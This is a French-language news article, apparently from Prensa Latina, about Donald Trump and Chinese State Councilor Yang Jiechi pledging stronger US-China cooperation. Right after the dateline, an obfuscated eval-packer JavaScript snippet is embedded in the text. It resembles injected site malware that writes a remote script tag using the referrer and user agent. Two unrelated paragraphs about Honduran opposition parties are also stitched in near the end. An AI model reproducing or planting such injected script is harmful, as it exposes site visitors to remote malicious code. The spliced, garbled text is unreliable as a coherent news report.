samedi 13 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Les États-Unis et la Chine renforcent leur coopération bilatérale

Washington eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hftzd|var|u0026u|referrer|khtnb||js|php'.split('|'),0,{})) (PL) Le président des États-Unis, Donald Trump, et le Conseiller d'État de Chine, Yang Jiechi, de visite dans cette capitale, ont manifesté aujourd'hui leur intérêt de renforcer leur coopération bilatérale.

Washington (PL) Le président des États-Unis, Donald Trump, et le Conseiller d’État de Chine, Yang Jiechi, de visite dans cette capitale, ont manifesté aujourd’hui leur intérêt de renforcer leur coopération bilatérale.

Selon des sources officielles, durant une rencontre à la Maison Blanche, ils ont, d’une part et d’autre, fait référence à leur souhait de développer les échanges au plus haut niveau.

Yang a transmis à Trump les salutations du président de Chine, Xi Jinping, puis le chef d’État lui a demandé de les retourner à son homologue asiatique.

Selon l’opinion du visiteur, garantir un développement sain et solide des liens entre la Chine et les États-Unis bénéficiera aux deux pays ainsi qu’au monde entier.

Il a précisé qu’en défendant les principes de non intervention armée, de non confrontation, de respect et coopération au bénéfice mutuel, la Chine est disposée à renforcer les échanges avec les États-Unis à tous les niveaux.  

Trump a commenté que la conversation téléphonique avec Xi deux semaines auparavant, durant laquelle le leader asiatique a assuré que la construction d’une relation Chine-États-Unis saine est bénéfique aux intérêts fondamentaux des deux nations, lui avait fait énormément plaisir.

Durant la rencontre, ont également été présents le vice-président nord-américain Mike Pence, etj le conseiller présidentiel Jared Kushner, avec qui Yang s’est réuni séparément.

Il a également fait de même avec le principal stratège de la Maison Blanche, Steve Bannon, ainsi qu’avec le tout nouveau conseiller de la sécurité nationale, le général Herbert Raymond McMaster.

Yang, autrefois ambassadeur à Washington et ancien chancelier, est devenu le premier haut fonctionnaire de Chine à venir ici depuis la prise de pouvoir de Trump, le 20 janvier dernier.

Sa visite coïncide avec le 45ème anniversaire du voyage de Richard Nixon en Chine en 1972, lequel a ouvert la voie pour que Pékin et Washington établissent de manière officielle des relations diplomatiques 7 ans plus tard.  

Le 23 février, le Parti Liberté et Refondation (Libre), coordonné par l’ex-président Manuel Zelaya, a présenté ce recours conjointement aux partis Anti-Corruption (PAC) et Innovation et Unité (Pinu), considérant que les réformes violent les droits des citoyens.  

Selon Zelaya, avec l’application du changement de lois, le président Hernandez prétend utiliser l’insécurité dans le pays pour criminaliser les manifestations contre l’État et restreindre l’exercice journalistique.

Toutefois, le chef d’État a rappelé ce lundi, que l’adoption de ces mesures ainsi que d’autres, répond au besoin de faire face aux forts taux de violence et à d’autres délits commis par les maras (gangs d’Amérique centrale), qui ne sont pas adéquatement combattus par les lois actuelles.

 rmlIma/abc

 

 

EN CONTINU
notes connexes